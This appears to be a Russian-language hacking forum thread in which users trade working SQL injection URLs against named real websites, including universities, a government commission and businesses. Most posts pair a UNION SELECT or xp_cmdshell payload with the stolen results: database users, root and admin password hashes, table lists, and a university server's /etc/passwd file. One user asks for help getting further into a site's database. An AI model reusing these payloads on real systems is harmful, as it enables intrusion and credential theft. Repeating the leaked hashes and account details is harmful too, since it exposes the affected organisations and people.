Хенк http://www.albatros-travel.dk/main.asp?product_id=1'+or+1=(@@version+);exec+master..xp_cmdshell+[dir+C:\]--
угу мы такие хекеры... http://www.unpan.org/autoretrieve/regional_focus.asp?region=europe&focus=1'%20or%201%3D%28select%20%27records%3A%27%2bcast%28count%28*%29%20as%20nvarchar%29%20from%20stellent..Users%20%20%20%29-- Плак Плак (((=
www.maineservicecommission.gov Code: http://www.maineservicecommission.gov/MVF/article.php?ID=-1+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12,13/* job.nenu.edu.cn Code: http://job.nenu.edu.cn/student/schshow.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,user,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+mysql.user/* root:69aa6ce56e31ae92
http://panicprice.com.ua/?event=search_like_product&id=-168682+union+select+concat_ws(0x203a20,table_schema,table_name)+from+information_schema.tables--&cId=-675
http://www.estcoenterprises.com/display_lines.php?cat_id=-9999+union+select+1,2,password+from+users/* Толи я чего, толи нету таблицы login(и её подобные) есть тока passw... И пасс подходит как логин\пасс http://www.estcoenterprises.com/admin/
http://www.mvservice.ru/price.php?do=5&open=380&popen=-1712+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3--&PHPSESSID=bf6f6d643c1f4e053c50090464152c87 Четвертая версия, вывод в заголовке страницы
http://www.devmaster.net/ - сайт программеров... =( http://www.devmaster.net/articles.php?catID=-6+union+select+1,convert(concat(user(),0x3a,database(),0x3a,version())+using+latin1)/* }{.3. 4e: http://www.sev.com.au/news.php?articleid=-3608+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12 Human Rights Resource Center: http://www.hrusa.org/field/listings.php?catid=-2+union+select+concat(version(),0x3a,database(),0x3a,user(),0x3a,name,0x3a,password),2,3,4+from+users/* admin:59395e208ea9aa41f94f1cfabe62dcad iPod? =))))))) http://www.ipoding.com/index.php?catid=-11+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21/*
Code: http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,concat_ws(0x3a,login,psw)+from+megaload_auth+limit+0,1/* Code: http://dj.chem.msu.ru/person.php?id=-165+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users/*
http://www.hairstudio.ro/sex.php?id=-5+union+select+1,count(table_name),user(),4+from+information_schema.tables/* user=\
Duke News =\ Code: http://www.dukemednews.duke.edu/news/article.php?id=-9583+UNION+SELECT+user(),2,version(),4,database(),concat(user,0x3a,password),7,8+from+mysql.user/* root:623460e26f081bbc web:761b2fc844890384 mnogosearch:0547d8b07eba42f3 =\
David Levine's Economic and Game Theory Page =\ Code: http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13/* http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user,0x3a,password),12,13+from+mysql.user/* http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.tables/* root:7cf9857402f566aa design:7cf9857402f566aa replicate:7cf9857402f566aa access:55d97f31500ff4ea levucla:6de799125318a5b4 xjfllehhq208951:57efde0a663a5956 xfjklmghq188885:0bb7efbf598cc88a xbiffikhq542373:72d927ea51170e2b xgbffgkhq522308:3d012a8c0201b3b8
http://www.eyeforpharma.com/index.asp?ch2=174+and+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('SubscriberContent_XREF','SUBSCRIBERS','SUBSCRIBERS_XREF','vwTravel_Contact','SubscribersBusiness_XREF','surround','SurveyAnswers','AeroUpload','AllArticles_DisplayTime_View','AREAS','AREAS_CHANNELS_XREF','AREASCHANNELSVIEW','Author_Profile','AUTHORS','authors_xref','AutoPrintSubs','AutoResponse','board','CATEGORY','CATEGORY_SUBCATEGORY_XREF','Channel_Article_View','CHANNEL_XREF','CHANNEL1_2_MENULINK','CHANNEL2_XREF','CHANNEL3_XREF','CHANNELS','CHANNELS2','CHANNELS3','COMMENTS','COMPANY','Counters','DailyNewsPopup','delegate_details','delegates','dir_temp','DIRECTORY','DIRECTORY_CATEGORY_XREF','DIRECTORY_old','DIRECTORY_SHAREPRICE_XREF','DIRECTORY_SUBCATEGORY_XREF','directoryxls','discussion_delegates','DNES3_Config','DNES3_Mode3','DNEServer_Config','dtproperties','Ebusiness','EMailArticleUsers','ENERGYEVENTS','EVENT','EVENTS','EXHIBITING','Expo','featuredContent','FeaturedContent2','feedback','FifteenWords','FrontPage_LocationMatrix','FrontPage_Services','Gerry_temp','ICDirectoryXPort','ICExportView','INDUSTRY','JOBS','JOBSBOARD','JOBSCOMPANIES','MarketsExchanges_NewsFeedOut_View','MCONNECT','messages','MforMobileNewsletter_ChannelExtract','news','Newsletter','Newsletter_Clips_Comment_View','Newsletter_ClipsComments','Newsletter_ClipsComments_Channel','Newsletter_ClipsComments_XREF','Newsletter_MeetPress','Newsletter_MeetPress_View','Newsletter_Reports_View','Newsletter_Reports_XREF','Newsletter_Responder','NewsletterArchiveFiles','OnlineMagazines','OPENING','PANEL','PANELSPEAKERS','PASSWORD','PERSON','PRESENTATION','presentations','PRESENTER','PublishedNewsletters_Reports_View','RECRUITMEN','RECRUITMENT','REGISTER','relatedstories','REPORT','REPORT_AREAS_XREF','Report_Content_View','REPORT_DISPLAY','REPORT_POLL_XREF','REPORT_SUBCHANNEL_XREF','REPORT_TRANSLATIONS_XREF','ReportCompanies_XREF','ReportLinkedCompanies','Reports_By_Author_View','Resource_Articles','Results','RESUMES','SendToFriendAddresses','SHAREPRICE','SHARES_DIRECTORY','SHARESTEMP','Sheet1$','Sheet2$','Sheet3$','Sht','Siwebtmp','STATS','STATS_REFERER','Stream','SUBCATEGORY','SUBCHANNEL_XREF','SUBCHANNELS','SurveyQuestion','sysconstraints','syssegments','t_jiaozhu','tbl_IPCapture','tbl_Visitor','tblAerospaceMembers','tblAuto_Contact_Details','tblAuto_Response_Category','tblAuto_Response_Conference','tblAuto_Response_Conferences','tblAuto_Response_Counter','tblAuto_X_REF','tblDirCategories','tblDirCompanies','tblDirCompanyCategoryXref','tblDirCompanyCustomerXref','tblDirCompanyPartnerXref','tblDirWebsite','tblEmail_Wizard','tblMobile_Delegates','tblPharma_Contact_Details','tblPharma_PP_Details','tblPharma_Response_Category','tblPharma_Response_Conferences','tblPharma_Response_Counter','tblPharma_Subscriber','tblPharma_X_REF','tblTransport_Contact_Details','tblTransport_Response_Category','tblTransport_Response_Counter','tblTransport_X_REF','tblTravel_Contact','tblTravel_Contact_Details','tblTravel_Contact_PostEvent','tblTravel_Contact_PostEvent2005backup','tblTravel_Contact2005backup','tblTravel_ContactMessage','tblTravel_ContactMessage2005backup','tblTravel_Country','tblTravel_Event','tblTravel_Response_Category','tblTravel_Response_Conferences','tblTravel_Response_Counter','tblTravel_User','tblTravel_User_Event','tblTravel_X_REF','Telematic','toplevel','toplevel','tpploPOLL_OPTIONS','tpplqPOLL_QUESTIONS','tpplrPOLL_RESULTS','TRANSLATION','TRANSLATIONS','transport_xml_feed_view','transportsubscribers','TRAVEL%20SEMINAR%20LIST','travel_delegates','travel_events','travel_events_xref','travel_messages','TravelRHS','tvp1CHANNEL','tvtp5CHANNEL','VENUE','view_AutoDailyPersonalised','VisitorLogins','Visitors','vw_DailyMailerSubscribers','WAP','WebsiteComment','xref_SubscriberVisitor','xx-DIRECTORY1','xx-DIRECTORY-2','xx-DIRECTORY-latest','xx-DIRECTORY-olddb'))-- Ebusiness (id, FirstName, LastName, Company, Position, Address1, Address2, State, Zip, Country, Telephone, Fax, Email, Occupation, Newsletter, WeeklyWrap, MoreInfo, MoreInfo2) EMailArticleUsers OnlineMagazines (id, Published, industry, IssueNo, Description, Link, Img, Counter) PASSWORD (PERSONCODE, EVENTCODE, CHECKED)
Code: http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/* Code: http://edu-net.khb.ru/index.php?page=news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8/*
http://info.l2r.ru/?part=items&id=1+or+1=@@version-- может кто подсказать что дальше делать, чтобы получить доступ к бд сайта? что то не получается у меня
Princeton University Program for Law and Public Affairs root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 "/etc/passwd" Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/openpkg/lib/openpkg/bash squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mysql:x:27:351:MySQL Server:/var/lib/mysql:/bin/bash openpkg:x:42000:42000:/openpkg OpenPKG (management):/openpkg:/openpkg/lib/openpkg/bash openpkg-r:x:42001:42001:/openpkg OpenPKG (restricted):/openpkg:/openpkg/lib/openpkg/bash openpkg-n:x:42002:42002:/openpkg OpenPKG (non-privileged):/openpkg:/openpkg/lib/openpkg/bash csgweb:x:61400:36::/home/csgweb:/bin/bash +agvols::0:0::: +facphoto::0:0::/var/local/as/home/facphoto: +puombuds::0:0::: +crosley::0:0::: +daveh::0:0::: +fleming::0:0::: +nmcstaff::0:0::: +oitdas::0:0::: +pucap::0:0::: +serge::0:0::: +stevea::0:0::: +fausey::0:0::: +albin::0:0::/var/local/as/home/albin: +agvols::0:0::/var/local/as/home/agvols: +officehr::0:0::/u/officehr: +mdmuzzie::0:0::/u/mdmuzzie: +acla06::0:0::/u/acla06: +genpurch::0:0::/u/genpurch: +uait::0:0::/var/local/as/home/uait: +pia::0:0::/u/pia: +tafsir::0:0::/u/tafsir: +transreg::0:0::/u/transreg: +afrstds::0:0::/u/afrstds: +restudy::0:0::/u/restudy: +odc::0:0::/u/odc: +jkchu::0:0::/u/jkchu: +newmedia::0:0::/u/newmedia: +ims::0:0::/var/local/as/home/ims: +eeweb::0:0::/var/local/as/home/eeweb: +eewebs::0:0::/var/local/as/home/eewebs: +philosph::0:0::/var/local/as Httpd.conf
вот так лучше.. Code: http://www.lookit.biz/news.php?viewcount=300&viewtype=3&pt=-1+union+select+1,2,3,concat_ws(char(58),acc_login,convert(acc_pwd%20using%20cp1251),acc_email),5,6+from+account/* Тока никак не могу подобрать кодировку пароля
Code: http://blogs.xnet.lv/index.php?zoomzina=-2532+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16/*